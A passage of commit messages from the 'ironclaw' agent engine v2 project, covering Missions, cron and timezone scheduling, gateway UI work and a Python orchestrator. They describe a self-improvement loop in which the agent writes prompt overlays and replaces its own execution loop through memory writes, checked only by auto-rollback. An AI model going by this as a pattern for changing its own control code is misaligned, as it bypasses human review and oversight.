fmt clean. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): demote trace/reflection logging from info to debug INFO-level log output from background tasks (trace analysis, reflection) corrupts the REPL terminal UI. The trace summary, issue warnings, and reflection doc previews were printing mid-approval-card, breaking the interactive display. Fix: all logging in trace.rs changed from info!/warn! to debug!/warn!. Trace analysis and reflection results now only show when RUST_LOG=ironclaw_engine=debug is set. Also added logging discipline rule to global CLAUDE.md: - info! → user-facing status the REPL intentionally renders - debug! → internal diagnostics (traces, reflection, engine internals) - Background tasks must NEVER use info! — it breaks the TUI Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(bridge): demote all router info! logging to debug! "engine v2: initializing" and "engine v2: handling message" were printing at INFO level, corrupting the REPL UI. All router logging now uses debug! — only visible with RUST_LOG=ironclaw=debug. Zero info! calls remain in crates/ironclaw_engine/ or src/bridge/. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(safety): demote leak detector warn-action logs from warn! to debug! The leak detector's Warn-action matches (high_entropy_hex pattern on web search results containing commit SHAs, CSS colors, URL hashes) were logging at warn! level, corrupting the REPL UI with lines like: WARN Potential secret leak detected pattern=high_entropy_hex preview=a96f********cee5 These are informational false positives — real leaks use LeakAction::Redact which silently modifies the content. Warn-action matches only log for debugging purposes and should not appear in production output. Changed to debug! level — visible with RUST_LOG=ironclaw_safety=debug. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): strengthen CodeAct prompt to prevent shallow text answers The model was answering "Suggested 45 improvements" as a brief text summary from training data without actually searching or listing them. The trace showed: no code block, no tool calls, no FINAL(). Prompt changes: - Rule 1: "ALWAYS respond with a ```repl code block. NEVER answer with plain text only." (was: "Always write code... plain text for brief explanations") - Rule 2 (NEW): "NEVER answer from memory or training data alone. Always use tools to get real, current information before answering." - Rule 3: FINAL answer "should be detailed and complete — not just a summary like 'found 45 items'" - Rule 8 (NEW): "Include the actual content in your FINAL() answer, not just a count or summary. Users want to see the details." Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(bridge): persist reflection docs to workspace for cross-session learning Replaces InMemoryStore with HybridStore: - Ephemeral data (threads, steps, events, leases) stays in-memory - MemoryDocs (lessons, specs, playbooks from reflection) persist to the workspace at engine/docs/{type}/{id}.json On engine init, load_docs_from_workspace() reads existing docs back into the in-memory cache. This means: - Lessons learned in session 1 are available in session 2 - The RetrievalEngine injects relevant past lessons into new threads - The engine genuinely improves over time as reflection accumulates Workspace paths: engine/docs/lessons/{uuid}.json engine/docs/specs/{uuid}.json engine/docs/playbooks/{uuid}.json engine/docs/summaries/{uuid}.json engine/docs/issues/{uuid}.json No new database tables. Uses existing workspace write/read/list. workspace() accessor widened to pub(crate). Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(bridge): adapt to execute_tool_with_safety params-by-value change Staging merge changed execute_tool_with_safety to take params by value instead of by reference (perf optimization from PR #926). Updated bridge adapter to clone params before passing. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * docs(engine): add web gateway integration plan to Phase 6 Documents three gaps between engine v2 and the web gateway: 1. No SSE streaming (engine emits ThreadEvent, gateway expects SseEvent) 2. No conversation persistence (engine uses HybridStore, gateway reads v1 DB) 3. No cross-channel visibility (REPL ↔ web messages invisible to each other) Implementation plan: bridge ThreadEvent→AppEvent, write messages to v1 conversation tables after thread completion. Prerequisite: AppEvent extraction PR (in progress separately). Also updated DB persistence status: HybridStore with workspace-backed MemoryDocs is now implemented (partial persistence). Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * docs(engine): document routine/job gap and SIGKILL crash scenario Routines are entirely v1 — not hooked up to engine v2. When a user asks "create a routine" as natural language, engine v2 tries to call routine_create via CodeAct, but the tool needs RoutineEngine + Database refs that the bridge's minimal JobContext doesn't provide. This caused a SIGKILL crash during testing. Options documented: block routine tools in v2 (short term), pass refs through context (medium), replace with Mission system (long term). Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * refactor: extract AppEvent to crates/ironclaw_common SseEvent was defined in src/channels/web/types.rs but imported by 12+ modules across agent, orchestrator, worker, tools, and extensions — it had become the application-wide event protocol, not a web transport concern. Create crates/ironclaw_common as a shared workspace crate and move the enum there as AppEvent. Also move the truncate_preview utility which was similarly leaked from the web gateway into agent modules. - New crate: crates/ironclaw_common (AppEvent, truncate_preview) - Rename SseEvent → AppEvent, from_sse_event → from_app_event - web/types.rs re-exports AppEvent for internal gateway use - web/util.rs re-exports truncate_preview - Wire format unchanged (serde renames are on variants, not the enum) Aligned with the event bus direction on refactor/architectural-hardening where DomainEvent (≡ AppEvent) is wrapped in a SystemEvent envelope. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(bridge): integrate with web gateway via AppEvent + v1 conversation DB Three changes to make engine v2 visible in the web gateway: 1. SSE event streaming (AppEvent broadcast): - ThreadEvent → AppEvent conversion via thread_event_to_app_event() - Events broadcast to SseManager during the poll loop - Covers: Thinking, ToolCompleted (success/error), Status, Response - Web gateway receives real-time progress without any gateway changes 2. Conversation persistence to v1 database: - After thread completes, writes user message + agent response to v1 ConversationStore via add_conversation_message() - Uses get_or_create_assistant_conversation() for per-user per-channel - Web gateway reads from DB as usual — chat history appears 3. Final response broadcast: - AppEvent::Response with full text + thread_id sent via SSE - Web gateway renders the response in the chat UI New EngineState fields: sse (Option<Arc<SseManager>>), db (Option<Arc<dyn Database>>). Both populated from Agent.deps. Agent.deps visibility widened to pub(crate). Depends on: ironclaw_common crate with AppEvent type (PR #1615). Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(bridge): complete Phase 6 — v1-only tool blocking, rate limiting, call limits Three security/stability improvements in EffectBridgeAdapter: 1. V1-only tool blocking: - routine_create, create_job, build_software (and hyphenated variants) return helpful error: "use the slash command instead" - Filtered out of available_actions() so system prompt doesn't list them - Prevents crash from tools needing RoutineEngine/Scheduler refs 2. Per-step tool call limit: - Max 50 tool calls per code block (AtomicU32 counter) - Prevents amplification: `for i in range(10000): shell(...)` - Returns "call limit reached, break into multiple steps" 3. Rate limiting: - Per-user per-tool sliding window via RateLimiter - Checks tool.rate_limit_config() before every execution - Returns "rate limited, try again in Ns" Architecture plan updated: - Gateway integration: DONE - Routines: BLOCKED (gracefully, with slash command fallback) - Rate limiting: DONE - Call limit: DONE - Phase 6 status: DONE (remaining: acceptance tests, two-phase commit) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * docs: add Mission system design — goal-oriented autonomous threads Missions replace routines with evolving, knowledge-accumulating autonomous agents. Unlike routines (fixed prompt, stateless), Missions: - Generate prompts from accumulated Project knowledge (lessons, playbooks, issues from prior threads) - Adapt approach when something fails repeatedly - Track progress toward a goal with success criteria - Self-manage: pause when stuck, complete when goal achieved Architecture: MissionManager with cron ticker spawns threads via ThreadManager. Meta-prompt built from mission goal + Project MemoryDocs via RetrievalEngine. Reflection feeds back automatically. 6-step implementation plan: cron trigger, meta-prompt builder, bridge wiring, CodeAct tools, progress tracking, persistence. Includes two worked examples: daily tech news briefing (ongoing) and test coverage improvement (goal-driven, self-completing). Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(engine): extend Mission types with webhook/event triggers + evolving strategy Mission types updated to support external activation sources: MissionCadence expanded: - Cron { expression, timezone } — timezone-aware scheduling - OnEvent { event_pattern } — channel message pattern matching - OnSystemEvent { source, event_type } — structured events from tools - Webhook { path, secret } — external HTTP triggers (GitHub, email, etc.) - Manual — explicit triggering only The engine defines trigger TYPES. The bridge implements infrastructure (cron ticker, webhook endpoints, event matchers). GitHub issues, PRs, email, Slack events all use the generic Webhook cadence — no special-casing in the engine. Webhook payload injected as state["trigger_payload"] in the thread's Python context. Mission struct extended: - current_focus: what the next thread should work on (evolving) - approach_history: what we've tried (for adaptation) - max_threads_per_day / threads_today: daily budget - last_trigger_payload: webhook/event data for thread context Plan updated with trigger type table and webhook integration design. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(engine): implement MissionManager execution with meta-prompts The MissionManager now builds evolving meta-prompts and processes thread outcomes for continuous learning: fire_mission() upgraded: - Loads Project MemoryDocs via RetrievalEngine for context - Builds meta-prompt from: goal, current_focus, approach_history, project knowledge docs, trigger payload, thread count - Spawns thread with meta-prompt as user message - Background task waits for completion and processes outcome - Daily thread budget enforcement (max_threads_per_day) Meta-prompt structure: # Mission: {name} Goal: {goal} ## Current Focus (evolves between threads) ## Previous Approaches (what we've tried) ## Knowledge from Prior Threads (lessons, playbooks, issues) ## Trigger Payload (webhook/event data if applicable) ## Instructions (accomplish step, report next focus, check goal) Outcome processing: - Extracts "next focus:" from FINAL() response → updates current_focus - Detects "goal achieved: yes" → completes mission - Records accomplishment in approach_history - Failed threads recorded as "FAILED: {error}" Cron ticker: - start_cron_ticker() spawns tokio task, ticks every 60s - Checks active Cron missions, fires those past next_fire_at 151 tests passing. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(bridge): wire MissionManager into engine v2 for CodeAct access Missions are now callable from CodeAct Python code: ```python # Create a daily briefing mission result = mission_create( name="Tech News", goal="Daily AI/crypto/software news briefing", cadence="0 9 * * *" ) # List all missions missions = mission_list() # Manually fire a mission mission_fire(id="...") # Pause/resume mission_pause(id="...") mission_resume(id="...") ``` Implementation: - MissionManager created on engine init, cron ticker started - EffectBridgeAdapter intercepts mission_* function calls before tool lookup and routes to MissionManager - parse_cadence() handles: "manual", cron expressions, "event:pattern", "webhook:path" - Mission functions documented in CodeAct system prompt - MissionManager set on adapter via set_mission_manager() after init (avoids circular dependency) System prompt updated with mission_create, mission_list, mission_fire, mission_pause, mission_resume documentation. 151 tests passing. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(bridge): map routine_* calls to mission operations in v2 When the model calls routine_create, routine_list, routine_fire, routine_pause, routine_resume, or routine_delete, the bridge now routes them to the MissionManager instead of blocking with an error. Mapping: routine_create → mission_create (with cadence parsing) routine_list → mission_list routine_fire → mission_fire routine_pause → mission_pause routine_resume → mission_resume routine_update → mission_pause/resume (based on params) routine_delete → mission_complete (marks as done) Routine tools removed from v1-only blocklist and restored in available_actions(). The model can use either "routine" or "mission" vocabulary — both work. Still blocked: create_job, cancel_job, build_software (need v1 Scheduler/ContainerJobManager refs). Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * test(engine): add E2E mission flow tests — 7 new tests Comprehensive mission lifecycle tests: - fire_mission_builds_meta_prompt_with_goal: verifies thread spawned with project context and recorded in history - outcome_processing_extracts_next_focus: "Next focus: X" in FINAL() response → mission.current_focus updated - outcome_processing_detects_goal_achieved: "Goal achieved: yes" → mission status transitions to Completed - mission_evolves_via_direct_outcome_processing: 3-step evolution: step 1 sets focus to "db module", step 2 evolves to "tools module", step 3 detects goal achieved → mission completes. Tests the full learning loop without background task timing dependencies. - fire_with_trigger_payload: webhook payload stored on mission and threads_today counter incremented - daily_budget_enforced: max_threads_per_day=1 → first fire succeeds, second returns None 157 tests passing (151 prior + 6 new mission E2E). Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(engine): self-improving engine via Mission system Wire the self-improvement loop as a Mission with OnSystemEvent cadence, inspired by karpathy/autoresearch's program.md approach. The mission fires when threads complete with issues, receives trace data as trigger payload, and uses tools directly to diagnose and fix problems. Key changes: Engine self-improvement (Phase A+B from design doc): - Add fire_on_system_event() to MissionManager for OnSystemEvent cadence - Add start_event_listener() that subscribes to thread events and fires matching missions when non-Mission threads complete with trace issues - Add ensure_self_improvement_mission() with autoresearch-style goal prompt (concrete loop steps, not vague instructions) - Add process_self_improvement_output() for structured JSON fallback - Seed fix pattern database with 8 known patterns from debugging - Runtime prompt overlay via MemoryDoc (build_codeact_system_prompt now async + Store-aware, appends learned rules from prompt_overlay docs) - Pass Store to ExecutionLoop for overlay loading Bridge review fixes (P1/P2): - Scope engine v2 SSE events to requesting user (broadcast_for_user) - Per-user pending approvals via HashMap instead of global Option - Reset tool-call limit counter before each thread execution - Only persist auto-approval when user chose "always", not one-off "yes" - Remove dead store/mission_manager fields from EngineState Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * Add checkpoint-based engine thread recovery * feat(engine): add Python orchestrator module and host functions Add the orchestrator infrastructure for replacing the Rust execution loop with versioned Python code. This commit adds the module and host functions without switching over — the existing Rust loop is unchanged. New files: - orchestrator/default.py: v0 Python orchestrator (run_loop + helpers) - executor/orchestrator.rs: host function dispatch, orchestrator loading from Store with version selection, OrchestratorResult parsing Host functions exposed to orchestrator Python via Monty suspension: __llm_complete__, __execute_code_step__ (nested Monty VM), __execute_action__, __check_signals__, __emit_event__, __add_message__, __save_checkpoint__, __transition_to__, __retrieve_docs__, __check_budget__, __get_actions__ Also makes json_to_monty, monty_to_json, monty_to_string pub(crate) in scripting.rs for cross-module use. Design doc: docs/plans/2026-03-25-python-orchestrator.md Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(engine): switch ExecutionLoop::run() to Python orchestrator Replace the 900-line Rust execution loop with a ~80-line bootstrap that loads and runs the versioned Python orchestrator via Monty VM. The orchestrator Python code (orchestrator/default.py) is the v0 compiled-in version. Runtime versions can override it via MemoryDoc storage (orchestrator:main with tag orchestrator_code). Key fixes during switchover: - Use ExtFunctionResult::NotFound for unknown functions so Monty falls through to Python-defined functions (extract_final, etc.) - Move helper function definitions above run_loop for Monty scoping - Use FINAL result value (not VM return value) in Complete handler - Rename 'final' variable to 'final_answer' to avoid Python keyword Status: 171/177 tests pass. 6 remaining failures are step_count and token tracking bookkeeping — the orchestrator manages these internally but doesn't yet update the thread's counters via host functions. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): all 177 tests pass with Python orchestrator - Increment step_count and track tokens in __emit_event__("step_completed") so thread bookkeeping matches the old Rust loop behavior - Remove double-counting of tokens in bootstrap (orchestrator handles it) - Match nudge text to existing TOOL_INTENT_NUDGE constant - Fix FINAL result propagation (use stored final_result, not VM return) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(engine): orchestrator versioning, auto-rollback, and tests Add version lifecycle for the Python orchestrator: - Failure tracking via MemoryDoc (orchestrator:failures) - Auto-rollback: after 3 consecutive failures, skip the latest version and fall back to previous (or compiled-in v0) - Success resets the failure counter - OrchestratorRollback event for observability Update self-improvement Mission goal with Level 1.5 instructions for orchestrator patches — the agent can now modify the execution loop itself via memory_write with versioned orchestrator docs. 12 new tests: version selection (highest wins), rollback after failures, rollback to default, failure counting/resetting, outcome parsing for all 5 ThreadOutcome variants. 189 tests pass, zero clippy warnings. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * docs: add engine v2 architecture, self-improvement, and dev history Three new docs for contributors: - engine-v2-architecture.md: Two-layer architecture (Rust kernel + Python orchestrator), five primitives, execution model with nested Monty VMs, bridge layer, memory/reflection, missions, capabilities - self-improvement.md: Three improvement levels (prompt/orchestrator/ config/code), autoresearch-inspired Mission loop, versioned orchestrator with auto-rollback, fix pattern database, safety model - development-history.md: Summary of 6 Claude Code sessions that built the system, key design decisions and debugging moments, architecture evolution from 900-line Rust loop to Python orchestrator Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(engine): complete v2 side-by-side integration with gateway API Wire engine v2 into the full submission pipeline and expose threads, projects, and missions through the web gateway REST API. Bridge routing — route ExecApproval, Interrupt, NewThread, and Clear submissions to engine v2 when ENGINE_V2=true. Previously only UserInput and ApprovalResponse were handled; all other control commands fell through to disconnected v1 sessions. Bridge query layer — add 11 read-only query functions and 6 DTO types so gateway handlers can inspect engine state (threads, steps, events, projects, missions) without direct access to the EngineState singleton. Gateway endpoints — new /api/engine/* routes: GET /threads, /threads/{id}, /threads/{id}/steps, /threads/{id}/events GET /projects, /projects/{id} GET /missions, /missions/{id} POST /missions/{id}/fire, /missions/{id}/pause, /missions/{id}/resume SSE events — add ThreadStateChanged, ChildThreadSpawned, and MissionThreadSpawned AppEvent variants. Expand the bridge event mapper to forward StateChanged and ChildSpawned engine events to the browser. Engine crate — add ConversationManager::clear_conversation() for /new and /clear commands. Code quality — replace 10 .expect() calls with proper error returns, remove dead AgentConfig.engine_v2 field, log silent init errors, fix duplicate doc comment, improve fallthrough documentation. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): empty call_id on ActionResult and trace analyzer false positives Fix structured executor not stamping call_id onto ActionResult — the EffectExecutor trait doesn't receive call_id, so the structured executor must copy it from the original ActionCall after execution. Empty call_id caused OpenAI-compatible providers to reject the next LLM request with "Invalid 'input[2].call_id': empty string". Fix trace analyzer false positives: - code_error check now only scans User-role code output messages (prefixed with [stdout]/[stderr]/[code ]/Traceback), not System prompt which contains example error text - missing_tool_output check now recognizes ActionResult messages as valid tool output (Tier 0 structured path) - Add NotImplementedError to detected code error patterns New trace checks: - empty_call_id: detect ActionResult messages with missing/empty call_id before they reach the LLM API (severity: Error) - llm_error: extract LLM provider errors from Failed state reason - orchestrator_error: extract orchestrator errors from Failed state Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(web): add Missions tab to gateway UI Add a full Missions page to the web gateway with list view, detail view, and action buttons (Fire, Pause, Resume). Backend: add /api/engine/missions/summary endpoint returning counts by status (active/paused/completed/failed). Frontend: - New "Missions" tab between Jobs and Routines - Summary cards showing mission counts by status - Table with name, goal, cadence type, thread count, status, actions - Detail view with goal, cadence, current focus, success criteria, approach history, spawned thread list, and action buttons - Fire/Pause/Resume actions with toast notifications - i18n support (English + Chinese) - CSS following the existing routines/jobs patterns Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): eagerly initialize engine v2 at startup The gateway API endpoints (/api/engine/missions, etc.) call bridge query functions that return empty results when the engine state hasn't been initialized yet. Previously, initialization only happened lazily on the first chat message via handle_with_engine(). Now when ENGINE_V2=true, the engine is initialized in Agent::run() before channels start, so the self-improvement mission and other engine state is available to gateway API endpoints immediately. Also rename get_or_init_engine → init_engine and make it public so it can be called from agent_loop.rs at startup. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(web): improve mission detail with markdown goal and thread table - Goal rendered as full-width markdown block instead of plain-text meta item (uses existing renderMarkdown/marked) - Current focus and success criteria also rendered as markdown - Spawned threads shown as a clickable table with goal, type, state, steps, tokens, and created date instead of a UUID list - Clicking a thread row opens an inline thread detail view showing metadata grid and full message history with markdown rendering - Back button returns to the mission detail view - Backend: mission detail now returns full thread summaries (goal, state, step_count, tokens) instead of just thread IDs Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(web): close SSE connections on page unload to prevent connection starvation The browser limits concurrent HTTP/1.1 connections per origin to 6. Without cleanup, SSE connections from prior page loads linger after refresh/navigation, eating into the pool. After 2-3 refreshes, all 6 slots are consumed by stale SSE streams and new API fetch calls queue indefinitely — the UI shows "connected" (SSE works) but data never loads. Add a beforeunload handler that closes both eventSource (chat events) and logEventSource (log stream) so the browser can reuse connections immediately on page reload. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(web): support multiple gateway tabs by reducing SSE connections Each browser tab opened 2 SSE connections (chat events + log events). With the HTTP/1.1 per-origin limit of 6, the 3rd tab exhausted the pool and couldn't load any data. Three changes: 1. Lazy log SSE — only connect when the logs tab is active, disconnect when switching away. Most users rarely view logs, so this saves a connection slot per tab. 2. Visibility API — close SSE when the browser tab goes to background (user switches to another tab), reconnect when it becomes visible. Background tabs don't need real-time events. 3. Combined with the existing beforeunload cleanup, this means: - Active foreground tab: 1 connection (chat SSE only, +1 if logs tab) - Background tabs: 0 connections - Closed/refreshed tabs: 0 connections (beforeunload cleanup) This allows many gateway tabs to coexist within the 6-connection limit. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): route messages to correct conversation by thread scope Messages sent from a new conversation in the gateway always appeared in the default assistant conversation because handle_with_engine ignored the thread_id from the frontend. Two fixes: 1. Engine conversation scoping — when the message carries a thread_id (from the frontend's conversation picker), use it as part of the engine conversation key: "gateway:<thread_id>" instead of just "gateway". This creates a distinct engine conversation per v1 thread, so messages don't cross-contaminate. 2. V1 dual-write targeting — write user messages and assistant responses to the v1 conversation matching the thread_id (via ensure_conversation), not the hardcoded assistant conversation. Falls back to the assistant conversation when no thread_id is present (e.g., default chat). Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(web): richer activity indicators for engine v2 execution The gateway UI showed only generic "Thinking..." during engine v2 execution with no visibility into CodeAct code execution, tool calls, or reflection. Now the event mapping produces detailed status updates: Step lifecycle: - "Calling LLM..." when a step starts (was "Thinki…
…1957) * fix(engine): compute next_fire_at for cron missions (#1944) MissionCadence::Cron missions never fired automatically because next_fire_at was initialized to None and never computed from the cron expression. The ticker checked next_fire_at <= now which was always false. - Add next_cron_fire() helper that parses cron expressions (5/6/7-field) and computes the next fire time, with optional timezone support - Compute next_fire_at in create_mission() for Cron cadence - Advance next_fire_at in fire_mission() after each successful fire - Recompute next_fire_at in resume_mission() for stale cron missions - Add regression tests covering create, fire, tick, and resume flows Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(engine): propagate user timezone to missions and CodeAct scripts (#1944) The LLM had to ask users for timezone because it wasn't available in context. Now: - Add user_timezone to ThreadExecutionContext (from thread metadata) - Store user timezone in thread metadata when received from channel - Auto-inject timezone into mission_create cron cadence from context - Expose user_timezone as a Monty/CodeAct context variable - Document user_timezone in the CodeAct preamble prompt Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * refactor: introduce ValidTimezone strict type in ironclaw_common (#1944) Address PR review feedback: timezone strings were stored and propagated without validation. Now: - Add ValidTimezone newtype in ironclaw_common that validates IANA timezone strings at construction (parse returns None for empty/invalid) - MissionCadence::Cron.timezone is now Option<ValidTimezone> - ThreadExecutionContext.user_timezone is now Option<ValidTimezone> - Bridge router validates timezone before storing in thread metadata - next_cron_fire() takes Option<&ValidTimezone> — no silent fallback - CodeAct scripting validates on read, falls back to "UTC" for missing - Fix orchestrator doc comment (bridge router, not ConversationManager) - Tighten test assertion to require strictly future next_fire_at - Add ValidTimezone unit tests (parse, serde roundtrip, empty/invalid) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix: remove clone_on_copy for ValidTimezone (clippy) ValidTimezone is Copy, so .clone() is unnecessary. Clippy CI caught this. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix: lenient timezone deserialization + bootstrap backfill (#1944) Address second round of PR review feedback: - Add deserialize_option_lenient() in ironclaw_common so persisted missions with invalid timezone strings deserialize as None instead of failing the whole record - Apply lenient deserializer to MissionCadence::Cron.timezone field - Backfill next_fire_at in bootstrap_project() for legacy cron missions that predate the scheduling fix (next_fire_at was None) - Remove unused chrono-tz direct dep from ironclaw_engine (now via ironclaw_common) - Add tests for lenient deserialization (valid, invalid, null, missing) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix: collapse nested if in bootstrap_project (clippy) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): address PR review — pre-spawn timezone, update_mission scheduling, polish Addresses 6 unanswered review comments on #1957: - (high, serrrfirat) router.rs: user_timezone was set after start_thread, so the executor's in-memory thread never saw it on the first turn. Threaded user_timezone through handle_user_message -> spawn_thread_with_history via a new initial_metadata param so it lands on the thread before the background task starts. source_channel is routed through the same path (had the same latent bug). - (high, serrrfirat / Copilot) update_mission: Manual -> Cron left next_fire_at = None and the mission stayed inert; cron expression edits kept firing on the old schedule. update_mission now recomputes next_fire_at for Cron and clears it for non-cron cadences. - (low, Copilot) parse_cadence: dropped trimmed.contains(' ') so cron expressions with tab/newline separators are detected. - (medium, Copilot) bootstrap_project: backfill save_mission failure now logs at debug! instead of being silently swallowed. - (low, Copilot) codeact_preamble: cron timezone is a default, not automatic — explicit timezone param overrides. Plus self-review polish: - normalize_cron_expression rejects 4-field (and other off-count) input up front with a clear error instead of falling through to the cron parser. - fire_mission has a comment explaining the catch-up semantics (next_fire_at recomputed from now(), missed windows coalesced). - New unit tests for next_cron_fire with an explicit America/New_York timezone, plus 3 update_mission regression tests for Manual->Cron, Cron->Manual, and cron expression change. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): DST/timezone tests, InvalidCadence error, lenient drop log Addresses the latest review on #1957: - Add EngineError::InvalidCadence and switch next_cron_fire to use it. Cron parse failures are validation errors, not store errors — callers can now map them to user-facing messages without misclassification. - Add DST regression tests in types/mission.rs covering the two tricky cases the PR exists to enable: * spring-forward gap (30 2 * * * on a missing-local-hour day must not land in the [02:00, 03:00) window) * fall-back overlap (30 1 * * * on a doubled-hour day must consistently round-trip) * 30-day window straddling spring-forward must contain both 13:00 and 14:00 UTC fires for an "9am NY" schedule Plus normalize_seven_field_cron and an InvalidCadence error path test. - Add a tz-positive test in runtime/mission.rs that creates a cron mission with America/New_York and asserts the resulting next_fire_at lands at UTC 13/14 (NY 09:00) rather than UTC 09 — exercising the full MissionManager → next_cron_fire chain end-to-end. - ironclaw_common::deserialize_option_lenient now logs at debug! when it drops an invalid IANA timezone string to None, so a typo in fresh user config is observable in logs even though the record loads. Adds tracing as a direct dep of ironclaw_common. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): suppress no-panics check on DST test helper The check_no_panics.py CI script has a pre-existing lexer bug where a lifetime apostrophe in this file (`Formatter<'_>` on line 38) puts its char-state lexer into character mode permanently, breaking brace tracking and so failing to detect that the new `schedule_after` test helper lives inside `#[cfg(test)] mod tests`. The script normally only checks added lines so the latent bug is invisible — my new helper exposed it. Use the script's documented `// safety:` per-line escape hatch to suppress the false positives. The helper is unambiguously a test-only helper and the panics are intentional in test context. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): log all next_cron_fire failure modes in bootstrap backfill PR review (Copilot): bootstrap_project only patched the legacy mission when next_cron_fire returned Ok(Some(next)). The Ok(None) case (cron expression with no upcoming fire times — e.g. a year-restricted expression in the past) and the Err(_) case (invalid expression) both fell through silently, leaving the mission Active with next_fire_at = None and no log signal — exactly the silent-stuck-mission scenario this PR is supposed to prevent. Match all three branches and emit a debug! log on each path so an operator can see which legacy missions need attention. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): close resume_mission TOCTOU window and stop fire_mission from orphaning threads Two medium-severity issues from PR review (serrrfirat): 1. **resume_mission TOCTOU.** The previous flow was `update_mission_status(Active)` followed by a separate `load + mutate next_fire_at + save` round-trip — leaving an extra interleave window where a concurrent `update_mission`/`fire_mission` write could be silently clobbered by the second save's stale reload. Use the mission already loaded for the ownership check, set `status = Active` and `next_fire_at`, and do a single `save_mission`. 2. **fire_mission orphan thread.** The thread was spawned, then `next_cron_fire(...)?` and `save_mission(...)?` ran. Both could propagate Err *after* the thread was already running, leaving: - no entry in `thread_history` - `threads_today` not incremented (budget bypassed) - no outcome watcher installed Two narrow fixes: - Install `spawn_mission_outcome_watcher` *before* `save_mission`. The watcher only depends on `thread_id` (it joins via ThreadManager and reloads the mission record itself), so a transient store error no longer abandons the running thread. - Replace `next_cron_fire(...)?` with match-and-log: a parse error on a corrupt persisted expression now preserves the existing `next_fire_at` and emits a `debug!` instead of aborting fire and unwinding past the spawn. Regression tests: - `fire_mission_with_corrupt_cron_expression_does_not_orphan_thread` - `resume_mission_preserves_concurrent_field_changes` Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): Paranoid Architect review — orphan/re-fire, TOCTOU, cron docs, resume tz Addresses 4 of 5 findings from serrrfirat's Paranoid Architect review on #1957 (the 5th is declined with rationale in the PR thread). 1. (HIGH) fire_mission save_mission failure non-fatal + tick() per-mission isolation. The previous code propagated `save_mission(...)?` after the thread was spawned, leaving an orphan thread *and* — for cron cadences — leaving next_fire_at un-advanced, causing the next tick to re-fire the same mission in a runaway loop. Now save is best-effort: log a `debug!` on failure and still return Ok(Some(thread_id)). The watcher is already installed (from the earlier round). Separately, tick() now catches per-mission load and fire failures with match-and-continue so a single bad mission doesn't abort the entire tick cycle. 2. (MED) bootstrap_project backfill TOCTOU: previously list_all_missions then a deferred save_mission could clobber concurrent writes with the stale snapshot. Now re-load the mission immediately before save and only patch if next_fire_at is still None — narrows the window significantly without adding a new Store trait method. Residual race documented inline. 3. (MED) 6-field cron ambiguity: the `0 9 * * * 2027` form could be read as either "sec min hr dom mon dow" (our normalizer's interpretation, matching the `cron` crate's native format) or Quartz-style "min hr dom mon dow year". Documented the assumed format in the doc comment, added a regression test pinning the interpretation, and noted it in the CodeAct preamble so users know to use the explicit 7-field form for year-bounded schedules. 4. (MED) user_timezone propagation on inject/resume: only set on new thread spawn before. Now the resume path writes the fresh tz to thread metadata before resume_thread() reloads from store, so the resumed execution sees the up-to-date value. The inject path is documented as a known limitation — updating live in-memory state in a running ExecutionLoop requires a new signal type (out of scope). Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): close latent next_fire_at bypass in ensure_* mission helpers PR review (serrrfirat): two private mission-creation helpers built a Mission via `Mission::new() + save_mission()` directly, skipping the `next_fire_at` computation that `create_mission` performs. Today every caller passes `OnSystemEvent` so the bug never bites — but a future caller passing `Cron` would silently re-introduce the original `next_fire_at = None` bug that #1944 fixes, and 